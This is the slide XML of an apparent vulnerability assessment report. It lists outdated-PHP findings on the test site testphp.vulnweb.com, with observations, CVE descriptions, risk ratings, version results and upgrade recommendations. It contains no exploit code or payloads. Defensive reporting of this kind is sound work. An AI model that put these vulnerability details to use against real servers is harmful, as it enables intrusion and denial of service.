                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Quattrocento Sans"/>
                        <a:ea typeface="Quattrocento Sans"/>
                        <a:cs typeface="Quattrocento Sans"/>
                        <a:sym typeface="Quattrocento Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>A 'mod_rewrite' workaround would be recommended as well.</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203" name="Google Shape;203;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9274629" y="3936274"/>
            <a:ext cx="557349" cy="348343"/>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204" name="Google Shape;204;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10877006" y="3936274"/>
            <a:ext cx="557349" cy="348343"/>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205" name="Google Shape;205;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245531" y="3936274"/>
            <a:ext cx="557349" cy="348343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608292" y="935736"/>
            <a:ext cx="7621308" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.12 / 5.4.2 CGI Query String Code Execution</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879566" y="1706880"/>
            <a:ext cx="10380617" cy="2795451"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.3.12 / 5.4.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616607" y="918319"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.9 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="217" name="Google Shape;217;p22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="257628" y="1341122"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="349675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2934775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.3.9. As such, it may be affected by the following security issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The 'is_a()' function in PHP 5.3.7 and 5.3.8 triggers a call to '__autoload()'. (CVE-2011-3379)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- It is possible to create a denial of service condition by sending multiple, specially crafted requests containing parameter values that cause hash collisions when computing  the hash values for storage in a hash table. (CVE-2011-4885)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An integer overflow exists in the exif_process_IFD_TAG function in exif.c that can allow a remote attacker to read arbitrary memory locations or cause a denial of service  condition. This vulnerability only affects PHP 5.4.0beta2 on 32-bit platforms. (CVE-2011-4566)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Calls to libxslt are not restricted via xsltSetSecurityPrefs(), which could allow an attacker to create or overwrite files, resulting in arbitrary code execution. (CVE-2012-0057)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An error exists in the function 'tidy_diagnose' that can allow an attacker to cause the application to dereference a NULL pointer. This causes the application to crash. (CVE-2012-0781)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The 'PDORow' implementation contains an error that can cause application crashes when interacting with the session feature. (CVE-2012-0788)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1350"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1350">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An error exists in the timezone handling such that repeated calls to the function 'strtotime' can allow a denial of service attack via memory consumption.(CVE-2012-0789)</a:t>
                      </a:r>
                      <a:endParaRPr sz="135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49675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                               HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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539075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1500"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1500">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>PHP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1500">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. </a:t>
                      </a:r>
                      <a:endParaRPr sz="15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49675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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611925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.3.9 or later.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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218" name="Google Shape;218;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9257210" y="4637296"/>
            <a:ext cx="583474" cy="374469"/>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219" name="Google Shape;219;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10898051" y="4632948"/>
            <a:ext cx="583474" cy="374469"/>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220" name="Google Shape;220;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7201989" y="4632948"/>
            <a:ext cx="583474" cy="374469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634419" y="927027"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.9 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1776549"/>
            <a:ext cx="10119360" cy="2516777"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.3.9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607898" y="970570"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>9. PHP &lt; 7.3.24 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="232" name="Google Shape;232;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its self-reported version number, the version of PHP running on the remote web server is prior to 7.3.24. It is, therefore affected by multiple vulnerabilities.</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>               HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>In PHP versions below 7.3.24, when PHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure.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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
